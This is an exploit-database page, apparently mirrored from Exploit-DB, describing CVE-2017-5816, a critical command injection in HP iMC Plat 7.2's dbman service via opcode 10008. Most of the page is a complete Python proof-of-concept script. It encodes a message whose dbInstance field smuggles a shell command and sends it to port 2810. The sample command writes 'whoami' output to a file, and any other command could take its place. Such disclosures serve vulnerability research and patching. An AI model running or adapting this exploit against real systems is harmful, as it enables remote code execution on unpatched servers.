header-logo
Suggest Exploit
vendor:
iMC Plat
by:
Chris Lyne
9,8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: iMC Plat
Affected Version From: iMC PLAT v7.2 (E0403) Standard
Affected Version To: iMC PLAT v7.2 (E0403) Standard
Patch Exists: YES
Related CWE: CVE-2017-5816
CPE: a:hewlett_packard:imc_plat:7.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2008 R2 Enterprise 64-bit
2017

HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE

This exploit allows an attacker to inject arbitrary commands into the HP iMC Plat 7.2 dbman Opcode 10008, which can be used to execute arbitrary code on the vulnerable system. The exploit creates a file 'C:10008.txt' on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

#!/opt/local/bin/python2.7

# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE
# Date: 11-29-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5816
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/

# note that this PoC will create a file 'C:\10008.txt'

from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys

ip = '192.168.1.74'
port = 2810
payload = "whoami > C:\\10008.txt"
opcode = 10008

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))

class DbmanMsg(Sequence):
    componentType = NamedTypes(
        NamedType('dbIp', OctetString()),
        NamedType('iDBType', Integer()),
        NamedType('dbInstance', OctetString()),
        NamedType('dbSaUserName', OctetString()),
        NamedType('dbSaPassword', OctetString()),
        NamedType('strOraDbIns', OctetString())
    )

msg = DbmanMsg()

msg['dbIp'] = ip
msg['iDBType'] = 4
msg['dbInstance'] = "a\"& " + payload + " &"
msg['dbSaUserName'] = "b"
msg['dbSaPassword'] = "c"
msg['strOraDbIns'] = "d"

encodedMsg = encoder.encode(msg, defMode=True)
msgLen = len(encodedMsg)
values = (opcode, msgLen, encodedMsg)
s = struct.Struct(">ii%ds" % msgLen)
packed_data = s.pack(*values)

sock.send(packed_data)
sock.close()

Navigation

Suggest Exploit

Services By CQR